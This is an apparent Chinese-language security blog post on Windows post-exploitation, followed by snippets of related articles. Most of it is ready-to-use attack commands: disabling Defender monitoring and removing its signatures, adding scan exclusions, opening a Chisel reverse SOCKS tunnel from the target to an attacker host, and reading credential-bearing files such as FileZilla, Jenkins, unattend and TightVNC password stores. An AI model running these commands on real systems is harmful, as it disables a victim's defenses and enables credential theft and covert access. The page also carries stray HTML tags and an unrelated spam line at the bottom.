<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    后滲透2

    VSole2021-10-11 06:55:16

    禁用Defender

            禁用AV/EDR產品在實踐中絕不是一個好主意,最好的辦法是繞過它。所有這些命令都需要本地管理權限。

    # Disable realtime monitoring altogether
    Set-MpPreference -DisableRealtimeMonitoring $true
    
    # Only disables scanning for downloaded files or attachments
    Set-MpPreference -DisableIOAVProtection $true
    

            添加一個排除目錄

    Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads\SuperLegitDownloadDirectory"
    

            或者你可以讓Defender處于啟用狀態,只是從它那里刪除所有病毒簽名。

    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    

    Chisel代理服務

            如果你需要在被攻擊的Windows機器上代理流量,Chisel是一個不錯的選擇。Chisel允許端口轉發,但我最喜歡的技術是在目標機器上設置一個反向SOCKS代理,允許你在目標系統上對任何流量進行隧道傳輸。

            在我們的攻擊機器上(本例中為Linux),我們以反向SOCKS5模式在80端口啟動一個Chisel服務器。

    sudo ./chisel server -p 80 --reverse --socks5
    

            在我們被攻擊的目標系統上,我們連接到這個服務器,并告訴它通過反向SOCKS5隧道代理所有流量。

    .\chisel.exe client 192.168.49.67:80 R:socks
    

            現在在我們的Linux機器的1080端口上打開了一個代理。我們現在可以使用例如ProxyChains來在目標系統上建立隧道。

    Juicy files

          有很多文件可能包含有趣的信息,像WinPEAS這樣的工具或像PowerSploit這樣的合集可能有助于識別文件。

            下面是我遇到的一些相關文件的清單、根據機器上安裝的程序和/或服務來檢查文件。

    # All user folders
    ## Limit this command if there are too many files ;)
    tree /f /a C:\Users
    
    # Web.config
    C:\inetpub\www\*\web.config
    
    # Unattend files
    C:\Windows\Panther\Unattend.xml
    
    # RDP config files
    C:\ProgramData\Configs\
    
    # Powershell scripts/config files
    C:\Program Files\Windows PowerShell\
    
    # PuTTy config
    C:\Users\[USERNAME]\AppData\LocalLow\Microsoft\Putty
    
    # FileZilla creds
    C:\Users\[USERNAME]\AppData\Roaming\FileZilla\FileZilla.xml
    
    # Jenkins creds (also check out the Windows vault, see above)
    C:\Program Files\Jenkins\credentials.xml
    
    # WLAN profiles
    C:\ProgramData\Microsoft\Wlansvc\Profiles\*.xml
    
    # TightVNC password (convert to Hex, then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts)
    Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name "Password" | select -ExpandProperty Password
    
    

    此外,別忘了用sqlcmd或Invoke-SqlCmd來列舉任何本地數據庫!

    config
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    漏洞信息`Apache Commons Configuration` 執行變量插值,允許動態評估和擴展屬性。從 `2.4` 版開始到 `2.7` 版,默認的 `Lookup` 實例集包括可能導致任意代碼執行或與遠程服務器聯系的插值器。
    raspi-config是一個用戶空間工具,它允許我們配置樹莓派的各個方面,其中之一是啟用各種外部接口。我們將使用raspi-config來啟用UART接口,首先啟動工具,如下所示: sudo raspi-config 這將導致出現以下結果:
    DHCP(Dynamic Host Configuration Protocol,動態主機配置協議)是一個局域網的網絡協議,主要作用就是給內部網或網絡服務供應商自動分配IP地址。當一個客戶端需要獲取一個IP地址時,將會向DHCP服務器發送廣播包,收到請求的服務器會提供一個可用的IP地址給客戶端,所以可以監聽該協議的包。本文介紹實施DHCP被動掃描的方法。
    前言最近注意到了Apache Commons Configuration 在2.7版本已經不安全了,能夠直接影響該組件,來分析學一下漏洞原理漏洞分析前置Commons Configuration是一個java應用程序的配置管理類庫。可以從properties或者xml文件中加載軟件的配置信息,用來構建支撐軟件運行的基礎環境。在一些配置文件較多較的復雜的情況下,使用該配置工具比較可以簡化配置文件的解析和管理。也提高了開發效率和軟件的可維護性。同樣可以使用這種變量插值影響范圍2.4 ~ 2.7漏洞首先引入Commons-Configuration的依賴
    在DHCP Client和DHCP Server之間建立一道防火墻,以抵御網絡中針對DHCP的各種攻擊。DHCP Client將無法獲取正確的IP地址和相關信息,導致合法客戶無法正常訪問網絡或信息安全受到嚴重威脅。將與合法DHCP服務器直接或間接連接的接口設置為信任接口,其他接口設置為非信任接口。
    0X00 原理原理就是,讀取本地微信文件夾中的config目錄下的AccInfo.dat文件AccInfo.dat文件內容如下圖這個Dat文件中包含了手機號,微信ID,微信號,昵稱和城市,綁定郵箱等信息0X01?福州,龍巖,南平,寧德,莆田,泉州,三明,廈門,漳州。白山,白城,長春,吉林,遼源,四平,松原,通化。撫州,贛州,景德鎮,九江,吉安,南昌,萍鄉,上饒,新余,鷹潭,宜春。鞍山,本溪,朝陽,大連,丹東,撫順,阜新,葫蘆島,錦州,遼陽,盤錦(PanJi
    DHCP于1993年10月成為標準協議,其前身是BOOTP協議。DHCP使網絡管理員能從中心結點監控和分配IP地址。當某臺計算機移到網絡中的其它位置時,能自動收到新的IP地址。
    Apache Solr發布公告,修復了ConfigSet API中存在的未授權上傳漏洞風險,該漏洞被利用可導致RCE(遠程代碼執行)。
    Todesk在安裝目錄下會生成一個config.ini配置文件,存儲的有設備代碼、臨時密碼、安全密碼以及登錄用戶和密碼等重要敏感信息,但密碼都經過Todesk特有的加密算法加密,所以不能通過解密得到明文密碼,只需要去替換這個配置文件,然后重啟服務即可。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类